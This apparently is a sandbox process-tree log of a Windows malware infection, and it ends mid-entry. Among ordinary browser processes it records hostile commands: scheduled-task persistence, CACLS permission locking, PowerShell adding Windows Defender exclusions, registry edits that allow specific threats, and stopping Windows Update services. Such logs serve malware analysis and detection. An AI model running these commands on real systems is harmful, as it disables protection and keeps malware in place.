C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3424 /prefetch:8
3⤵
PID:8668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
3⤵
PID:10484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
3⤵
PID:10676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
3⤵
PID:1444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
3⤵
PID:10664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
3⤵
PID:8156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
3⤵
PID:9052

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5688 /prefetch:8
3⤵
PID:10232

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5688 /prefetch:8
3⤵
PID:7232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2108 /prefetch:1
3⤵
PID:3572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
3⤵
PID:564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:1
3⤵
PID:8852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
3⤵
PID:9896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
3⤵
PID:7352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
3⤵
PID:11024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
3⤵
PID:10248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6236 /prefetch:2
3⤵
PID:7856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
3⤵
PID:10100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
3⤵
PID:6852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
3⤵
PID:10736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1
3⤵
PID:8088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
3⤵
PID:656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,11462701793886375084,11516732260051770462,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
3⤵
PID:10876

C:\Users\Admin\AppData\Local\Temp\6CA6.exe
C:\Users\Admin\AppData\Local\Temp\6CA6.exe
1⤵
PID:5844

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
2⤵
PID:5520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
3⤵
PID:3664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:4812

C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
4⤵
PID:4432

C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
4⤵
PID:7736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4⤵
PID:8312

C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
4⤵
PID:8584

C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
4⤵
PID:4856

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
3⤵
- Creates scheduled task(s)
PID:5228

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
3⤵
PID:6656

C:\Users\Admin\Desktop\rkill.exe
"C:\Users\Admin\Desktop\rkill.exe"
1⤵
PID:6244

C:\Users\Admin\Desktop\rkill64.exe
C:\Users\Admin\Desktop\rkill.exe
2⤵
PID:2444

C:\Users\Admin\AppData\Local\Temp\70BE.exe
C:\Users\Admin\AppData\Local\Temp\70BE.exe
1⤵
PID:3160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 3812 -ip 3812
1⤵
PID:6724

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:1920

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:6828

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:6376

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:6652

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:324

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:1700

C:\Users\Admin\AppData\Local\Temp\908B.exe
C:\Users\Admin\AppData\Local\Temp\908B.exe
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 812
2⤵
- Program crash
PID:1088

C:\Users\Admin\AppData\Local\Temp\93E8.exe
C:\Users\Admin\AppData\Local\Temp\93E8.exe
1⤵
PID:4024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6332 -ip 6332
1⤵
PID:6652

C:\Users\Admin\AppData\Local\Temp\9B7A.exe
C:\Users\Admin\AppData\Local\Temp\9B7A.exe
1⤵
PID:1376

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 576
3⤵
- Program crash
PID:2100

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\tlxvacrdjkek.xml"
1⤵
- Creates scheduled task(s)
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4556 -ip 4556
1⤵
PID:4856

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:2136

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:4240

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
1⤵
PID:2304

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Desktop\a\smss.exe"
2⤵
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 5860 -ip 5860
1⤵
PID:6512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4152 -ip 4152
1⤵
PID:7148

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7676

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffd83b746f8,0x7ffd83b74708,0x7ffd83b74718
1⤵
PID:2228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:7696

C:\Users\Admin\AppData\Local\Temp\1A8F.exe
C:\Users\Admin\AppData\Local\Temp\1A8F.exe
1⤵
PID:7760

C:\Users\Admin\AppData\Local\Temp\1F62.exe
C:\Users\Admin\AppData\Local\Temp\1F62.exe
1⤵
PID:7492

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
PID:1636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 312
2⤵
- Program crash
PID:2944

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:8504

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:7424

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:9508

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:9012

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:8404

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:9444

C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\CschRTb.exe
C:\Users\Admin\AppData\Local\Temp\qFlLvwsJSrNNJIEdB\VntZkdGCrMlsdQW\CschRTb.exe pg /awsite_idMKC 385118 /S
1⤵
PID:9064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:6060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:6372

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:2864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:10404

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:7472

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:3772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:10364

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:8708

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:7796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:10000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:11076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:9436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:7836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:9760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:9852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:11084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:3132

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:7716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:9512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:11080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:6524

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:8096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:4240

C:\Windows\SysWOW64\reg.exe
